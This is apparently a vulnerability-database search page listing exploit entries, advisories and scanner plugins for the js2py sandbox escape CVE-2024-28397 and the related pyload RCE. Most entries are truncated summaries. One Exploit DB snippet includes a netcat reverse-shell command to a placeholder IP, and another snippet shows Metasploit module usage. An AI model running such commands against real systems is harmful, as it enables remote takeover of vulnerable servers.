Lucene search
K

19 matches found

Exploit DB
Exploit DB
added 2026/04/30 12:0 a.m.78 views

Js2Py 0.74 - RCE

Exploit Title: Js2Py 0.74 - RCE Date: 2026-02-03 Exploit Author: Ali Sünbül xeloxa Author Page: https://github.com/xeloxa Vendor Homepage: https://github.com/PiotrDabkowski/Js2Py Software Link: https://pypi.org/project/Js2Py/ Version: payload.js python3 exploit.py -c "nc -e /bin/bash 10.10.10.10...

5.3CVSS6.6AI score0.04548EPSS
Exploits22
Packet Storm
Packet Storm
added 2025/12/18 12:0 a.m.168 views

📄 js2py 0.74 Automated Sandbox Escape / Code Execution

js2py version 0.74 automated sandbox escape and remote code execution exploit with a reverse shell. ============================================================================================================================================= | Title : js2py v0.74 Automated Sandbox Escape & Revers...

5.3CVSS8.3AI score0.04548EPSS
Exploits22
GithubExploit
GithubExploit
added 2025/09/06 11:39 a.m.257 views

Exploit for CVE-2024-28397

🚨 Remote Code Execution – CVE-2024-28397 pyload-ng / js2py...

5.3CVSS7.6AI score0.04548EPSS
Exploits22
Tenable Nessus
Tenable Nessus
added 2025/09/02 12:0 a.m.4 views

Linux Distros Unpatched Vulnerability : CVE-2024-28397

The Linux/Unix host has one or more packages installed that are impacted by a vulnerability without a vendor supplied patch available. - An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call. CVE-2024-28397 Note that...

5.3CVSS7AI score0.04548EPSS
Exploits22References2
GithubExploit
GithubExploit
added 2025/08/17 4:0 a.m.939 views

Exploit for CVE-2024-28397

CVE-2024-28397-command-execution-poc This vulnerability arises...

5.3CVSS7.2AI score0.04548EPSS
Exploits22
0day.today
0day.today
added 2024/11/18 12:0 a.m.806 views

Pyload Remote Code Execution Exploit

CVE-2024-28397 is a sandbox escape in js2py versions 0.74 and below. js2py is a popular python package that can evaluate javascript code inside a python interpreter. The vulnerability allows for an attacker to obtain a reference to a python object in the js2py environment enabling them to escape...

9.8CVSS6.8AI score0.16513EPSS
Exploits22
Packet Storm
Packet Storm
added 2024/11/18 12:0 a.m.385 views

Pyload Remote Code Execution

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'rex/stopwatch' class MetasploitModule 'Pyload RCE CVE-2024-39205 with js2py sandbox escape CVE-2024-28397', 'Description' = %q CVE-2024-28397 is sandbox escape ...

9.8CVSS7AI score0.16513EPSS
Exploits22
Metasploit
Metasploit
added 2024/11/15 6:53 p.m.1898 views

Pyload RCE (CVE-2024-39205) with js2py sandbox escape (CVE-2024-28397)

CVE-2024-28397 is sandbox escape in js2py use exploit/linux/http/pyloadjs2pycve202439205 msf exploitpyloadjs2pycve202439205 show targets ...targets... msf exploitpyloadjs2pycve202439205 set TARGET msf exploitpyloadjs2pycve202439205 show options ...show and set options... msf...

9.8CVSS7.7AI score0.16513EPSS
Exploits22
OSV
OSV
added 2024/09/09 6:17 p.m.39 views

GHSA-R9PP-R4XF-597R pyload-ng vulnerable to RCE with js2py sandbox escape

Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...

9.8CVSS5.8AI score0.16513EPSS
Exploits22References5
Github Security Blog
Github Security Blog
added 2024/09/09 6:17 p.m.44 views

pyload-ng vulnerable to RCE with js2py sandbox escape

Summary Any pyload-ng running under python3.11 or below are vulnerable under RCE. Attacker can send a request containing any shell command and the victim server will execute it immediately. Details js2py has a vulnerability of sandbox escape assigned as CVE-2024-28397, which is used by the...

9.8CVSS7AI score0.16513EPSS
Exploits4References5Affected Software1
OpenVAS
OpenVAS
added 2024/07/10 12:0 a.m.11 views

openSUSE Security Advisory (SUSE-SU-2024:2272-1)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

5.3CVSS5.7AI score0.04548EPSS
Exploits22References4
OpenVAS
OpenVAS
added 2024/07/08 12:0 a.m.12 views

Mageia: Security Advisory (MGASA-2024-0256)

The remote host is missing an update for the SPDX-FileCopyrightText: 2024 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only ifdescription...

5.3CVSS7.1AI score0.04548EPSS
Exploits22References4
Tenable Nessus
Tenable Nessus
added 2024/07/03 12:0 a.m.23 views

openSUSE 15 Security Update : python-Js2Py (SUSE-SU-2024:2272-1)

The remote openSUSE 15 host has a package installed that is affected by a vulnerability as referenced in the SUSE- SU-2024:2272-1 advisory. - CVE-2024-28397: Fixed a potential sandbox escape via untrusted JavaScript code bsc1226660. Tenable has extracted the preceding description block directly...

5.3CVSS6.8AI score0.04548EPSS
Exploits22References4
OSV
OSV
added 2024/07/02 10:7 a.m.14 views

SUSE-SU-2024:2272-1 Security update for python-Js2Py

This update for python-Js2Py fixes the following issues: - CVE-2024-28397: Fixed a potential sandbox escape via untrusted JavaScript code bsc1226660...

5.3CVSS5.6AI score0.04548EPSS
Exploits22References3
GithubExploit
GithubExploit
added 2024/06/21 4:43 a.m.1380 views

Exploit for CVE-2024-28397

Perkenalan 中文 js2py is a popular python...

5.3CVSS7.9AI score0.04548EPSS
Exploits22
OSV
OSV
added 2024/06/20 5:15 p.m.15 views

CVE-2024-28397

An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call...

5.3CVSS7.5AI score0.04548EPSS
Exploits22References4Affected Software1
Cvelist
Cvelist
added 2024/06/20 12:0 a.m.27 views

CVE-2024-28397

An issue in the component js2py.disablepyimport of js2py up to v0.74 allows attackers to execute arbitrary code via a crafted API call...

0.04548EPSS
Exploits22References2
Circl
Circl
added 2024/06/19 7:8 p.m.9 views

CVE-2024-28397

creationtimestamp| type| source ---|---|--- 2024-06-19 19:08:33+00:00| published-proof-of-concept| https://t.me/proxybar/2126 2024-06-20 11:31:03+00:00| published-proof-of-concept| https://t.me/CNArsenal/2690 2024-06-20 14:26:37+00:00| published-proof-of-concept|...

5.3CVSS6.7AI score0.04548EPSS
Exploits22References13
GithubExploit
GithubExploit
added 2024/06/19 1:46 a.m.953 views

Exploit for CVE-2024-28397

Introduction 中文 Analysis Chinese./an...

5.3CVSS6.9AI score0.04548EPSS
Exploits22
Rows per page
Query Builder